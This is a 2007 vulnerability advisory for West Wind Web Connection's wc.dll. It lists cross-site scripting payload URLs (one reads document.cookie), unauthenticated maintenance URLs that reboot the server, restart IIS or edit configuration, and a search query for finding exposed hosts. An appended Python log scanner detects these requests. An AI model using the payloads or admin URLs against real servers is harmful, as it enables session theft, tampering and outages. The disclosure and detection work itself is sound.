WCONNECT WC.DLL Cross-Site Scripting Vulnerability & Remote Privileges Escalation

2007-12-16 / 2007-12-17
Credit: Doz
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

[HSC] WCONNECT WC.DLL Cross-Site Scripting Vulnerability

West Wind Web Connection is a tool for building Web applications using the Visual FoxPro environment, but it is also vulnerable to cross-site scripting attacks. Admins need to password-protect the application, since it is installed without a password by default. Also sanitize the code to disallow XSS attacks or JavaScript.

Hackers Center Security Group (http://www.hackerscenter.com)

Credit: Doz
Risk: Medium
Class: Cross Site Scripting
Remote: YES
Local: Yes
Vendor: West Wind Technologies http://www.west-wind.com
Product Version: All Versions

* Attackers can exploit these issues via a web client.

Examples:

/wc.dll?=%22%3E%3Cscript%3Ealert('Hello');%3C/script%3E
/wiki/wc.dll?AA~%22%3E%3Cscript%3Ealert('Hello');%3C/script%3E
/wc.dll?Wiki~Admin/%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

Remote Privileges Escalation: (Password Unprotected Application)

Log - /wc.dll?wwmaint~showlog
ISAPI Configuration - /wc.dll?_maintain~ShowStatus
DLL Error Log - /wc.dll?wwMaint~wcDLLErrorLog
Server Status - /wc.dll?wwMaint~ServerStatus
View of settings - /wc.dll?wwmaint~ShowStatus
Editing Config Files - /wc.dll?wwMaint~EditConfig
Reboot Machine - /wc.dll?wwMaint~RebootMachine
Restart IIS - /wc.dll?wwMaint~RebootMachine~&RestartOnly=On
Web Connection Kill - /wc.dll?wwmaint~sessions~KILL

Google Search: http://www.google.com/search?q=ext%3Adll+inurl%3A%28wc%29&btnG=Search&hl=en
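
A log check for the two issues above, as an added example that is not part of the original advisory: it scans IIS W3C extended log lines for wc.dll requests whose query string carries script markup or names one of the maintenance handlers listed above, and marks maintenance requests that returned 200 with no authenticated user. The sample log lines, their IP addresses and the finding labels are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Maintenance handler prefixes listed in the advisory (case-insensitive).
MAINT_RE = re.compile(r"^(wwmaint|_maintain)~", re.I)
# Heuristic for script markup that has no place in a wc.dll query string.
XSS_RE = re.compile(
    r"<\s*script|javascript:|\bon(error|load|click|mouseover)\s*=", re.I)

# Constructed sample log (documentation-range IPs), not real traffic.
SAMPLE = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query cs-username c-ip sc-status
2007-12-17 10:00:01 GET /wc.dll wwMaint~ShowStatus - 198.51.100.7 200
2007-12-17 10:00:05 GET /wiki/wc.dll AA~%22%3E%3Cscript%3Ealert('Hello');%3C/script%3E - 198.51.100.7 200
2007-12-17 10:01:00 GET /wc.dll wwmaint~showlog admin 192.0.2.10 200
2007-12-17 10:02:00 GET /wc.dll Wiki~Home - 192.0.2.11 200
""".splitlines()

def scan_w3c(lines):
    """Yield (client_ip, decoded_query, findings) for suspicious wc.dll hits."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if not row.get("cs-uri-stem", "").lower().endswith("/wc.dll"):
            continue
        # Decode twice so double-encoded markup (%253C) is also seen.
        query = unquote(unquote(row.get("cs-uri-query", "-")))
        findings = []
        if XSS_RE.search(query):
            findings.append("xss-markup")
        if MAINT_RE.match(query):
            # No user name plus a 200 means the handler answered anonymously.
            anonymous = row.get("cs-username", "-") == "-"
            served = row.get("sc-status") == "200"
            findings.append(
                "maint-unauthenticated" if anonymous and served else "maint-access")
        if findings:
            yield row.get("c-ip", "?"), query, findings

if __name__ == "__main__":
    for client, query, findings in scan_w3c(SAMPLE):
        print(client, findings, query)
```
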

